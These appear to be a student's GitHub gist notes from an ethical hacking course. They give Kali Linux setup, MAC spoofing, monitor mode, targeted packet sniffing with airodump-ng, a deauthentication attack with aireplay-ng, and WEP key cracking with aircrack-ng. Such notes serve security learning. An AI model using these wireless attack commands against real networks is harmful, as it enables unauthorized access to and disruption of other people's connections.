Skip to content

Instantly share code, notes, and snippets.

@Tyler-Pritchard
Last active February 8, 2024 19:06
Show Gist options
  • Save Tyler-Pritchard/6b5910a9e5b286ddd1a1adceca52166a to your computer and use it in GitHub Desktop.
Save Tyler-Pritchard/6b5910a9e5b286ddd1a1adceca52166a to your computer and use it in GitHub Desktop.
Ethical Hacking From Scratch Course Notes
SETTING UP THE VIRTUAL MACHINE
-Install VirtualBox
-Install Kali-Linux machine from downloaded from https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
-DO NOT use "VMWare Images", select "VirtualBox Images" on section's tab
-Confirm use of NAT network in network settings
-Login: root, PW: toor
-Take snapshot, "Fresh Install"
-Launch Kali cli, run "apt-get update"
-Run:
apt-get install terminator
-add Terminator to dock for easy access
-Terminator allows for multiple window frames in one cli
SETUP ANTANNAE
-select USB setting from Ports in Kali-Linux
-Run:
apt-get update
apt install realtek-rtl88xxau-dkms
-restart virtualbox
Change MAC Address
-Run:
ifconfig
ifconfig wlan0 down
ifconfig wlan0 hw(hardware) ether 00:00:00:00
ifconfig wlan0 up
CHANGE TO RANDOM MAC ADDRESS
-Run:
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 down
macchanger -s wlan0
CHANGE MODE MONITOR/MANAGED
-Run:
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
PACKET SNIFFING
**MUST BE IN MONITOR MODE**
-iwconfig
-airodump-ng wlan0
-ctrl + c to quit application
TARGET PACKET SNIFFING
-airodump-ng —bssid 00:00:00:00:00:00 —channel # —write test wlan0
-use Wireshark to decrypt packets(see futue Wireshark lesson)
-you may view files on an open network
DEAUTHENTICATION ATTACK
- aireplay-ng —deauth [#deauth packets] -a [NetworkMac] -c [TargetMac] [Interface(mon0)]
-attack can be used to reroute client to a page that “fixes” the problem, but contains script
WEP Crack
CODE: airodump-ng —bssid 00:00:00:00:00:00 —channel (number) —write basic_wep wlan0(my network)
-need to capture large number of packets —> using airodump-ng
-analyse the captured IVs and crack the key —> using aircrack-ng
CODE: aircrack-ng basic_wep-01.cap
-should say “KEY FOUND!”
-connect target network using ESSID(network) name, using ASCII as pw, or using key “[ 00:00:00:00:00 ]” (remove the “:” from the key
-restart Kali and connect again
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment